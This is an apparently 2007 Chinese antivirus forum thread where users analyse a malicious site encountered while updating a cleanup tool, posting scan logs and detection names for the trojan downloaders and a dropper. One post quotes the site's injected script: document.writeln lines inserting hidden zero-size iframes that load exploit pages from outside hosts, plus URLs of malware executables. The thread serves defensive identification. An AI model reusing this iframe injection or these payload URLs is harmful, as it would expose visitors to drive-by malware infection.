升级清理专家时弹出来毒站。。

显示全部楼层 · 发表于 2007-11-29 05:39:22

ht.......tp://ww1.801mov.cn/index.htm

显示全部楼层 · 发表于 2007-11-29 06:29:33

Starting the file scan:

Begin scan in 'E:\新建文件夹 (2).rar'
E:\新建文件夹 (2).rar
  [0] Archive type: RAR
  --> ÐÂ½¨ÎÄ¼þ¼Ð (2)\14[1].htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/ADODB.Exploit.Gen
  --> ÐÂ½¨ÎÄ¼þ¼Ð (2)\svcos[1].exe
   [DETECTION] Contains detection pattern of the dropper DR/Delphi.Gen
   [INFO]    The file was deleted!

显示全部楼层 · 发表于 2007-11-29 08:49:00

已删除: 木马程序 Trojan-Downloader.JS.Agent.aep 文件: C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\新建文件夹 (2)\14[1].htm
已删除: 木马程序 Trojan-Downloader.VBS.Agent.gu 文件: C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\新建文件夹 (2)\142[1].htm
已删除: 木马程序 Trojan-Downloader.JS.Agent.aes 文件: C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\新建文件夹 (2)\jet[1].htm
已删除: 病毒 Heur.Downloader (变种) 文件: C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\新建文件夹 (2)\svcos[1].exe

显示全部楼层 · 发表于 2007-11-29 12:28:08

Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: bbs.kafan.cn/attachment.php?aid=160142
Information: Contains detection pattern of the HTML script virus HTML/ADODB.Exploit.Gen

显示全部楼层 · 发表于 2007-11-29 13:00:54

<SCRIPT language=JavaScript src="img/css.js"></SCRIPT>

里面一堆

document.writeln("<iframe width='0' height='0' src='http://blog.uubls.cn/re/rll.html'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/00.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/142.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/14.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/jet.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/pp.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/ch.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/open.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/bd.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/bf.htm'></iframe>");
document.writeln("<iframe width='0' height='0' src='http://qqname.8866.org/img/lz.htm'></iframe>");

第二第三个相同

http://just.yule2007.com/newl/svcos.exe
http://qqname.8866.org/img/css.exe
http://qqname.8866.org/img/svcos.exe

显示全部楼层 · 发表于 2007-11-29 14:04:23

微点砍掉

显示全部楼层 · 发表于 2007-11-29 15:02:00

扫描开始时间: 2007-11-29 15:01:32
扫描日志
NOD32 版本 2692 (20071128) NT
命令行: C:\Documents and Settings\Administrator\桌面\新建文件夹 (2).rar

日期: 2007年11月29日时间: 15:01:35
反 Rookits 技术已启用。
已扫描磁盘、文件夹和文件: C:\Documents and Settings\Administrator\桌面\新建文件夹 (2).rar
C:\Documents and Settings\Administrator\桌面\新建文件夹 (2).rar ?RAR ?新建文件夹 (2)\svcos[1].exe<病毒 - Win32/Spy.Delf.NGF 木马>
已扫描文件数量: 4
已发现病毒数量: 1
完成时间: 15:01:36 总共扫描时间: 1 秒 (00:00:01)

显示全部楼层 · 发表于 2007-11-29 15:47:16

原帖由 Graybird 于 2007-11-29 06:29 发表
Starting the file scan:

Begin scan in 'E:\新建文件夹 (2).rar'
E:\新建文件夹 (2).rar
  [0] Archive type: RAR
  --> ÐÂ½¨ÎÄ¼þ¼Ð (2)\14[1].htm
  ...

Filename	Result
14[1].htm	MALWARE

The file '14[1].htm' has been determined to be 'MALWARE'.
Our analysts named the threat HTML/ADODB.Exploit.Gen. The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script.This malware is detected by a special detection routine from the engine module.

Filename	Result
142[1].htm	MALWARE

The file '142[1].htm' has been determined to be 'MALWARE'.
Our analysts named the threat TR/Dldr.Agent.GU.2. The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection is added to our virus definition file (VDF) starting with version 7.00.01.20.

Filename	Result
jet[1].htm	MALWARE

The file 'jet[1].htm' has been determined to be 'MALWARE'.
Our analysts named the threat TR/Dldr.Agent.Aes.1. The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection is added to our virus definition file (VDF) starting with version 7.00.01.20.

Filename	Result
svcos[1].exe	MALWARE

The file 'svcos[1].exe' has been determined to be 'MALWARE'.
Our analysts named the threat DR/Delphi.Gen. The term "DR/" denotes a program that is able to place a virus or a malware discretely on a system.This malware is detected by a special detection routine from the engine module.

显示全部楼层 · 发表于 2007-11-29 15:54:53

avast found Win32:Delf-AGT

显示全部楼层 · 发表于 2007-11-29 16:37:08

Roboon：程序:
D:\我的文档\桌面\SVCOS[1].EXE
木马程序生成以下文件:
1) C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\MSINFO\SYSTEM76.INS
是否删除木马程序及其衍生物?

[已鉴定] 升级清理专家时弹出来毒站。。